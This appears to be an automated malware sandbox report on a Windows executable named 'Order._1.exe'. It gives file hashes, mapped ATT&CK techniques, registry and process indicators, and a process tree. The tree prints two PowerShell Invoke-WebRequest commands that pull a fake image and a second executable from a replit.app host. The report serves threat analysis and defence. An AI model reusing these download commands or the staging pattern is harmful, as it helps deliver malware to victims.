cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8

General

Target

Order._1.exe
Size

288KB
MD5

587be0c9be93274c3d38ef27c3a50aa4
SHA1

6808c0da1276c7ad2021ffb7c0b8d743f5c87b35
SHA256

cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8
SHA512

5d2dbadb93ae2d91c3e7af58be9b28a7270a86b1c3b2bfbae64f232a06f26efa72162dc4adb22ce1f269429eecb2d4b5b44e1c1494658de702c1f2dad0c9c879
SSDEEP

3072:Cq6+ouCpk2mpcWJ0r+QNTBf2Wk1qXkXRA4XTZ5N:Cldk1cWQRNTB+l8KN

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2316	powershell.exe
2696	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Order._1.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2316	powershell.exe
2696	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2696	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 1656	2004	Order._1.exe	29
PID 2004 wrote to memory of 1656	2004	Order._1.exe	29
PID 2004 wrote to memory of 1656	2004	Order._1.exe	29
PID 2004 wrote to memory of 1656	2004	Order._1.exe	29
PID 1656 wrote to memory of 2316	1656	cmd.exe	31
PID 1656 wrote to memory of 2316	1656	cmd.exe	31
PID 1656 wrote to memory of 2316	1656	cmd.exe	31
PID 1656 wrote to memory of 2696	1656	cmd.exe	33
PID 1656 wrote to memory of 2696	1656	cmd.exe	33
PID 1656 wrote to memory of 2696	1656	cmd.exe	33

C:\Users\Admin\AppData\Local\Temp\Order._1.exe
"C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F602.tmp\F603.tmp\F604.bat C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\F602.tmp\F603.tmp\F604.bat

Filesize
336B

MD5
01c5cda0bd57d42a84beff225913c7f6

SHA1
1047c8ce097c87214b5337c98278f4ce5a5896f7

SHA256
454734ff80f0ff62344d6adeaf700983b1d5da605d192226e3a1e40020ec0d31

SHA512
76af6d488d7fdf8d701d16e0c884811df4c7a7bf34b74c30f7e993490420ebb895889048ae9ec5ca82d037f49de42028fca751d66915df543cd4394fcff727b2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
4642b21b8f12258876c2f6beddddadeb

SHA1
221ff71c5ad1aca6f3740d70bbe5b4de9546661e

SHA256
e47fa23763f1f09c4e23e5268ff518ad20e92a38914225903a14180e8691774b

SHA512
a3d38076bbab1ed78caf58e09867f70bd1ca4e0ef11388edf3a72943139694aa4529ba141ff426f02080bbc6c977a5f128a0e27d70f4821023fae492e12915f4

Download Submit
memory/2316-11-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-8-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2316-9-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-12-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-7-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2316-10-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-13-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-14-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

Filesize
9.6MB

Download
memory/2316-6-0x000007FEF5A4E000-0x000007FEF5A4F000-memory.dmp

Filesize
4KB

Download
memory/2696-20-0x000000001B660000-0x000000001B942000-memory.dmp

Filesize
2.9MB

Download
memory/2696-21-0x0000000002350000-0x0000000002358000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing